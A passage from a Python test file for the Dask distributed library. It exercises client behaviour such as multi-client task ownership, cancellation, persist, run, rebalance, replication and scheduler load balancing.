assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
while s.tasks:
await asyncio.sleep(0.01)
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
while not s.tasks:
await asyncio.sleep(0.01)
proc.terminate()
while s.tasks:
await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
while not y.cancelled():
await asyncio.sleep(0.01)
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
while s.tasks:
await asyncio.sleep(0.01)
def test_cancel_sync(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 30
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
async def foo():
return "bar"
with pytest.warns(FutureWarning, match="Client.run "):
results = await c.run_coroutine(foo)
assert results == {a.address: "bar", b.address: "bar"}
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
with pytest.raises(Exception, match="hello world"):
await x
@gen_cluster(
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "1 GiB"},
config={"distributed.worker.memory.rebalance.sender-min": 0.3},
)
async def test_rebalance(c, s, *_):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
# We used nannies to have separate processes for each worker
a, b = s.workers
# Generate 10 buffers worth 512 MiB total on worker a. This sends its memory
# utilisation slightly above 50% (after counting unmanaged) which is above the
# distributed.worker.memory.rebalance.sender-min threshold.
futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
await wait(futures)
# Wait for heartbeats
while s.memory.process < 2 ** 29:
await asyncio.sleep(0.1)
assert await c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
await c.rebalance()
ndata = await c.run(lambda dask_worker: len(dask_worker.data))
# Allow for some uncertainty as the unmanaged memory is not stable
assert sum(ndata.values()) == 10
assert 3 <= ndata[a] <= 7
assert 3 <= ndata[b] <= 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 3,
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "1 GiB"},
)
async def test_rebalance_workers_and_keys(client, s, *_):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
a, b, c = s.workers
futures = client.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
await wait(futures)
# Wait for heartbeats
while s.memory.process < 2 ** 29:
await asyncio.sleep(0.1)
# Passing empty iterables is not the same as omitting the arguments
await client.rebalance([])
await client.rebalance(workers=[])
assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
a: 10,
b: 0,
c: 0,
}
# Limit rebalancing to two arbitrary keys and two arbitrary workers.
await client.rebalance([futures[3], futures[7]], [a, b])
assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
a: 8,
b: 2,
c: 0,
}
with pytest.raises(KeyError):
await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
# can't use the 'c' fixture because we need workers to run in a separate process
with Client(n_workers=2, memory_limit="1 GiB", dashboard_address=":0") as c:
s = c.cluster.scheduler
a, b = (ws.address for ws in s.workers.values())
futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
wait(futures)
# Wait for heartbeat
while s.memory.process < 2 ** 29:
sleep(0.1)
assert c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
c.rebalance()
ndata = c.run(lambda dask_worker: len(dask_worker.data))
# Allow for some uncertainty as the unmanaged memory is not stable
assert sum(ndata.values()) == 10
assert 3 <= ndata[a] <= 7
assert 3 <= ndata[b] <= 7
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
"""Client.rebalance() internally waits for unfinished futures"""
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
# Let the futures reach the scheduler
await asyncio.sleep(0.1)
# We didn't wait enough for futures to complete. However, Client.rebalance() will
# block until all futures are completed before invoking Scheduler.rebalance().
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
"""rebalance() raises KeyError if explicitly listed futures disappear"""
f = Future("x", client=c, state="memory")
with pytest.raises(KeyError, match="Could not rebalance keys:"):
await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
while x.status != "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
while any(v for w in s.workers.values() for v in w.processing):
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster()
async def test_set_as_default(s, a, b):
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
assert default_client() is c2
async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
assert default_client() is c3
async with Client(
s.address, set_as_default=False, asynchronous=True
) as c4:
assert default_client() is c3
await c4.scheduler_comm.close()
while c4.status != "running":
await asyncio.sleep(0.01)
assert default_client() is c3
with pytest.raises(ValueError):
default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
